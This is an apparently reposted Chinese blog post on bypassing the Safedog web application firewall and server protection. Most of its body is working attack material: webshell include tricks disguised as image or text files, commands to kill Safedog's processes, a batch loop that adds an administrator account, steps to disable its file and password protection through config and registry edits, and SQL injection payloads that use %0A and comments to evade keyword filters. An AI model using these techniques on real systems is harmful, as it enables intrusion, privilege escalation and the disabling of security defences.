注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

包含文件结束进程杀狗  

2015-06-21 01:02:40|  分类: WAF绕过 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
帖子转自:http://bbs.secbox.cn/thread-92-1-1.html

包含shell过狗

asp:<!–#include file=”lcx.asp;1.jpg”–>

php:<?php
include(‘logo.txt’);
?>



强制结束进程:  taskkill /f /t /im SafeDogGuardCenter.exe

结束进程2:  ntsd -c q -pid 1032



安全狗,在命令下添加用户:

for /l %i in (1,1,1000) do @net user test test /add&@net localgroup administrators test
/add

ad.bat 使用
for /l %%i in (1,1,1000) do @net user test test /add&@net localgroup administrators test
/add



安全猪开启各种保护,突破方法:

首先在Shell下把安全猪的安装配置给下来 默认安装路径:

C:\Program Files\SafedogServer\SafeDogGuardCenter\Config\DirDefend.xml

导入本地的安全服务器安全狗查看 主动防御 – 文件及目录保护 查看是否开启各种保护

如果开启了,直接关掉。然后再把DirDefend.xml替换到远程服务器上去,重启服务器,各种操作。





安全猪开启密码保护模式,突破方法:

打开注册表 regedit ,找到HKEY_LOCAL_MACHINE\SOFTWARE\Safedog\SafedogSR 删除SafedogSR 即可
突破安全猪密码保护。







测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512
用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。

测试详细步骤:
1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注
入测试:
http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user

另外:在Apache+php+Mysql环境中:
先按常规进行注入尝试:
http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”

因为and、user()均为黑名单里的关键字。那么我们加入%0A再次尝试:
http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”
http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’

当然,%0A只是一个思路,由此发散开来便是多个%0A叠加,或者与注释符–、/**/混合使用。比如:
http://192.168.91.152:8000/About.php?did=-2%0Aunion–%0Aselect%0Auser()
  评论这张
 
阅读(104)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017